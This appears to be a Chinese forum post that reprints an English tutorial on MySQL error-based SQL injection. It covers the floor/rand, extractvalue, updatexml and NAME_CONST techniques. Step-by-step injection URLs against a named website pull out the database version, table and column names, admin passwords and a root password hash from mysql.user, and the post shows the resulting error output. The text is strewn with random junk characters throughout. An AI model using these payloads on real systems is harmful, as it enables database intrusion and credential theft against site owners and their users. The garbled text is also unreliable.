|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:8 B4 o9 ^* y& S+ ]
首先进行正常查询: mysql> select * from article where id = 1;
$ e" [! d! M8 N( O; z2 E+—-+——-+———+& {, P9 L6 B9 }3 x. G2 u6 I( ]! q
| id | title | content |
# w" P$ ^' M1 a/ b" n; o+—-+——-+———+
5 _2 c6 V* Q/ ~| 1 | test | do it |1 W* M9 H9 K3 ?2 ?
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
, v+ C* u/ i+ U0 PERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。+ ?6 f% G2 F) _+ c/ P
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ l- o" E, @# R2 DERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2))); a& s: g2 \ y0 s0 g
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue; q0 o. ^0 p# A# P# D
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–' x. c+ ^( `% n5 t
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
5 r* G0 I0 ?2 l; r; U/ e
# {" i! d+ e+ q& x/ ]7 _/ `( H+ z2 n再收集: : @$ K: o# ]0 ^
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ) Z5 X! ?+ O" Z0 Q4 e/ s' U( B
f3 k# {2 f9 m8 A- ^Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’2 f( X: \/ f- R( x* N" w/ @
7 R2 L8 Y+ M6 N: c8 Y
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)( u, @4 V) Z. j! K" N
# m/ {) o, d& }1 f u5 k3 V# Q( r
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 1 N c O# `& T
( M) y' z% S! Z' H1 u1 G# |# {MYSQL高版本报错注入技巧-利用NAME_CONST注入
: W! C& t# ?; g( vIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. 6 ]# }7 j l4 z6 m* ?' R
' E; U e' a' }6 T# M9 r
. L, `( v9 p% H' ^& W相关信息+ S; a* P4 ~$ J1 ~/ L1 `& M( W) Y
1 \) ?1 a9 S8 D, T. q' e
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
! v& X S& p: |8 Z3 }/ R9 }
! m- ]! _# A& {3 `6 z: bCode:, b" G) k) k. A2 p" P
NAME_CONST(DATA, VALUE)) v J) @! X0 F, D/ |$ @/ e1 ^
0 P+ O! C' {2 h7 G! [
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
; F+ i% _3 `* Q) _1 x4 K+ S9 M, a" V8 r4 y6 M% Z9 x$ ~+ O3 K, z
SELECT NAME_CONST('TEST', 1)
+ C; e( ~" a: n: ]3 N t) d8 s% D1 c
& T( ~5 H+ z7 D% N; v9 ?
( ^" i, F* K: }3 W7 f8 i7 H" I5 h|---------------|" }1 `% Y8 I) w! Z- [. a9 P
| TEST |- o; D+ R S( ]! K5 E. w4 M
| |
; t( \$ L: l; c5 c h$ b|---------------|& d* \4 T8 U5 x# X7 I" f& i
| 1 |
9 ]& D- l( S% J0 e: F) A0 S| |
( @! {$ h3 \7 [5 ]|---------------|4 W; U$ {( H0 y9 `$ V8 K
* R* w' L8 K; m. F# n; U: O" j' X
, n; t! M* j0 E, G5 x k
; s& [7 N3 e% y7 {! E! f) E/ K8 l7 f% l, B6 N
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
1 Z. B5 d2 ~1 v* p: |Intro to MySQL Variables
. v, D, Q0 g/ v2 L( d6 p3 I4 H7 M
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.2 `1 y: t3 C. b3 ^& H" ?9 K# ]
/ d9 ^/ y' A/ X0 `
Code:1 e2 s' |7 O' y- n2 c
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2613 {; P1 q' i7 \$ V* y
3 P& D( D9 n; Z' m2 K9 z
3 c5 Y: R3 A# L& B" ~& \1 H' T. C% @3 J0 c
/ c }" F* W$ G
! M4 h: e; H. @4 G% ?" k) b. FCode:
# y2 s/ M* k- `3 wand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--% x8 Z! ?, Y6 r( r, D
& k `' ~* w9 m; d+ B% b
9 z8 h9 Y- s$ ~ g. L( s! ?2 O
VAR = Your MySQL variable.7 E* U( ^4 X z% @8 D
4 S9 @/ `+ S. DMySQL 5.1.3 Server System Variables
; y3 l8 }) z0 a' B4 i! F. @6 I, }% P/ S; M* E; D0 l% |5 ]6 @4 ?* K
Let's try it out on my site... m9 [1 V' [! l
. s, b G( P: _9 A- ^2 j( @Code:
; `8 s8 h. f: Z9 S+ h ohttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
" `/ F# ?% n0 D
4 B" C/ I9 A# [5 j' Z4 o% zErroruplicate column name '5.0.27-community-nt'8 {; ^- g% E* i8 F
8 l! k* O, a+ H# O1 A! f. u# H, U' ~1 b. f
7 Y2 n! ?% Q, r/ L- X, M0 E- d& |- i. U# K/ y. ?, \( y& e& B
. B$ Y& D' ?, ^+ O% F9 uNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
( @, J( G- Q1 R, V" g/ w' r% L. b! H x- [ o/ J+ K
Data Extraction. r) }4 i0 Y2 g% o7 k7 F- X
2 `! @) Q/ U# i1 f7 e* RCode:
: n9 q6 l" x- F+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--) W5 o5 J7 ]* d
/ j, w2 c. E5 ?! W; F: @% ]. P* |3 [3 C
We should get a duplicate column 1 error...
1 U- E& R4 ^8 m9 v, a6 [7 Q& _, j# ?$ P
Code:) q, ]2 W2 K( r/ C, y+ a( w0 I
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
3 z$ z7 F# G* `3 o* J, t1 e
& O3 D1 g( U- dErroruplicate column name '19 m. k$ h, Q3 `/ {
3 w; H7 b8 A% x4 a( `1 R& v$ P& \- R5 H8 s: \2 d
# A7 y+ f5 u& \4 E# U. a& _
4 {; y: ^4 D- N, q: z5 `" ]) J/ b1 S# w, e% C
# W- Y! c# c9 u& ^ J8 |
Now let's get the tables out this bitch..
8 S$ l1 S5 s9 _7 m1 U
, D2 O, p$ X8 C9 l, RCode:
% p" o2 L K- a9 x& Q* G/ G+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
7 Q2 o y& r: d8 {5 u; t1 M
9 n/ \9 A3 s& o) v
- Q" H6 l2 x* N8 K/ _) hLet's see if it works here, if it does, we can go on and finish the job.
" F$ q- u# q$ N. V
! W7 j4 P( G2 m/ g1 ~- L! ~Code:
# G8 Q9 X% g1 u* i* y% T4 phttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
4 g0 F" M9 _1 ~% E1 [8 H% g7 U" Y5 y; m/ s( f( v6 I9 D: ^. Q) k' V
0 M# F6 G2 v0 q
Erroruplicate column name 'com_admanage
6 f' l7 x+ D; d; ^0 u4 w
2 p$ D& r" b# E7 y# a. a! K) {4 c0 ?& P3 ~# Q; k
7 [) k6 K8 n t8 i. |+ @' p. o8 m/ ]: k& ^2 Z
; y$ T: d/ c. v9 r8 S8 B9 e5 [+ Z- b' y8 q H
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
$ T+ e: H; _" @5 ?0 n$ W' q0 n- U) |# Z m0 u6 n$ |8 Y/ t- u+ K; @
Let's get the columns out of the user table..7 O: k" ~$ ?/ k) W) T
) b) S$ W2 }# `. C9 FCode:. d7 h9 Z+ t: U* J: H, J
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--3 v9 Z, j" E% L4 \
o4 p; R/ y. ?( C/ a3 ?1 V4 a' F* |" z' `& J3 ~
So mine looks like this, and I get the duplicate column name 'Host'.
: \* b% s4 x7 C) E9 _5 b; b0 `% l9 z( I/ @. I8 P# `' T4 p
Code:+ h& n- ?( v: S) f9 I
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
7 D5 V8 `5 v1 M1 M- p8 Z; |8 U4 _; E; a& b* v9 s g9 t# a4 Y1 v
Erroruplicate column name 'Host'$ i: ?% F/ l8 r/ r$ c+ u, Q
. Q* S8 |$ {; \1 q- x* H8 r7 N$ x9 Z: z/ O" h( ?
/ ^" X2 V! B v+ s' Q
6 _3 _: H5 ]: E9 g! n- O" |
* Z; H& b, ^' W) w) a
9 [2 L0 d6 d( ^" d# \( {: ^# eWoot, time to finish this bitch off.
) ` N3 g- q/ ?: e, t: S8 ~" _9 H' x u8 T7 {
Code:+ E' N% J& U$ B3 l* [5 Y; Z
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)-- U- f+ p! e6 a; X) [8 R
8 o/ H& y2 [4 H9 y
- I0 a+ N: `/ w* M$ h
So mine looks like this...( A; O$ ~ E' w; w4 Y i8 M
0 }# }$ K( X0 m1 |% v8 f& XCode:8 {1 L/ _! Y1 y4 i/ W/ p
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--7 i( v$ y5 w$ |) B7 G
7 h: b- _ ~8 R9 \
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
( Y. b6 _" A) Y8 K2 ?% i |: p. w" \$ D8 P
+ k: i0 l- u9 k) D2 A 9 f& q$ U9 A6 M8 w. m" u; f7 S
9 X2 Y. |" X/ x- N2 N
, o7 v+ w7 F. m4 d
! w2 A$ [, E& \3 c- b5 pAnd there we have it, thanks for reading.8 v' _9 j- K# o' [* M5 U2 n
6 e( l1 l" N7 L8 d6 W. h* O4 z
|
发表于 2015-11-11 19:03:37
收藏
支持
反对